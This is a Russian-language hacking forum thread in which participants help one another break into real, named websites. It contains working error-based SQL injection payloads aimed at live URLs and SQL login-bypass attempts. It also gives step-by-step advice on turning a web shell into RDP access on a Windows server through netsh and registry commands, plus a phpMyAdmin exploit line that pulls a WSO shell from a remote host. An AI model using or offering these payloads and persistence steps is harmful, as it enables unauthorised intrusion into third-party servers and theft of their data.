способ великолепен, спасибо, но к сожалению колонка subid INT, поэтому записать левак туда не удастся. P.S. попробовал 1' or(1,2)=(select count(*),concat((select concat(table_name,0x3a,column_name) from information_schema.columns where table_schema !=0x696e666f726d6174696f6e5f736368656d61 limit 0,1),0x3a,floor(rand()*2)) from information_schema.columns group by 2 limit 0,1)+' уже лучше. MYSQL ERROR: Operand should contain 1 column(s) Можно же вывести через duplicate column ? P.P.S все решилось 1'+and+(select*from(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+INFORMATION_SCHEMA.TABLES+limit+0,1),1,64),floor(rand(0)*2)))z)+and+'1 спасибо FlaktW
@попугай если мы речь ведем про мускуль имеет место вот такое: insert into TABLE (id, subid, date, data) values ('666', 'SQL', '1', '1') insert into TABLE (id, subid, date, data) values ('666', 'SQL',(select concat_ws(0x3a,version(),user()), '2'),('3','3','1','1') это так сказать в защиту моей теории
Code: http://www.gasniergicquel.com/customer/home.php?cat=2'and(select*from(select(name_const((select(concat_ws(0x3a,version(),user()))),1)),name_const((select(concat_ws(0x3a,version(),user()))),1))a)and'
sourcec0de, спасибо! Помоги и этим: HTML: http://www.proximeety.gr/member-321531[sql].html P.S. Сообщение не цитируйте, пожалуйста! P.P.S. Модеры, не удаляйте это сообщение!
Помогите скуль крутануть. Бред, не получается нихера = \ _http://cs.hz.by/bans/ban_details_ex.php?bhid=16683
Там нету скули. Пропускаются только цифровые значения. Специально буду цитировать твои сообщения, потому что ты поступаешь не по феншую.
Получил шелл на сайте. ОС системы, где стоит сайт - Windows. Как получить графический доступ? Пытался сувать батник, и запустить его, служба удаленного управления не запускается( вот код запуска, мб я что-то напутал? Code: netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable
Тебе нужно убедиться, что стандартный rdp порт для тебя будет открыт на фаере шлюза. Во-вторых, нужно добавить юзера, с которым заходишь, в группу remoteusers или как-то так. Ну и в-третьих, проще залить что-нибудь туда, что само даст мордочку, имхо, если есть возможность, конечно.
друзья, только начинаю знакомство с sql injection, нашел один сайт без проверки на простейшую инъекцию. Если %27, то: Code: DB Error: syntax error SELECT login, password FROM emps WHERE login = '' or 1=1 --' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 2] а если 'admin' or "1"="1" /* то: Code: DB Error: unknown error SELECT login, password FROM emps WHERE login = 'admin' or "1"="1" /*' [nativecode=144 ** Table './tradtyru/emps' is marked as crashed and last (automatic?) repair failed] Скажите, я все правильно делаю и все правильно кто-то уже сделал до меня, зарегав пользователя "; DROP TABLE", или я чего-то не учитываю? P.S. не называю сайт, хочу сам расковырять, если возможно.
насчет юзера, это все ясно. Через батник он добавляется спокойно. А насчет мордочки, можешь ченить поконкретнее посоветовать?
Хм, что-то выдумать, кроме vnc, ничего не могу. Может, сообщество ау? А начни проще, у тебя порт слушается? netstat?
дохрена подключений по rdp? ты уверен что служба рдп запущенна что бы ее открывать в фаерволе? просто даже если добавил пользователя и октрыл для нее порт в фаерволе а служба не запущенна хрен что у тебя получится! net start TermService как то так вроде. @rad_scorp судя по коду ошибки во втором варианте таблице ппц, хотя могу ошибаться. а еще использование много строчного не закрытого комментария в 5 версии MySql вызывает ошибку. у тебя какая версия?
Хм. Да, не так все просто, как все сложно, но ман нетстата почитать неплохо бы. Держи: Code: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netstat -a -n | findstr "3389" Это разрешает соединения к терминальному серверу и затем удостоверяется, что сервис up and running. Это та самая галочка во вкладке свойств моего компьютера. В xp фаер вроде не мешает, если мешает - можно выключить. На 2008 (а значит, и, скорее всего, в 7) мы сталкивались с тем, что сервак увезли, а включить rdp забыли, и так просто туда не долезть. Тогда надо в реестре у фаера пару правил поправить, но сейчас не вспомню, если надо, в понедельник в личку пиши. Если слушающего порта не появилось, то я не нашел, как ТС включить без перезагрузки. У меня net start "Terminal Services" не работает.
Не знаю, пока предположений нет. Попробовать union чтобы хоть какие-то версии отсечь? И такую ли ошибку выдает?
С помощью эксплойта через phpMyAdmin/scripts/setup.php выводит phpinfo(); allow_url_fopen on magic_quotes_gpc on при попытке залить полноценный шелл с помощью такой конструкции PHP: file_put_contents('wso.php',file_get_contents('http://www.*********.com/wso/******.txt')); одинарная кавычка экранируется обратным слешем \' тестил на другом сайте с такими же вышеуказанными параметрами шелл все равно заливается 8-0 пытался кавычку, часть запроса или весь запрос хексить и чарить, не помогло Подскажите пожалуйста где я ошибся, и каким еще образом можно попытаться обойти экранирование и залить полноценный шелл.
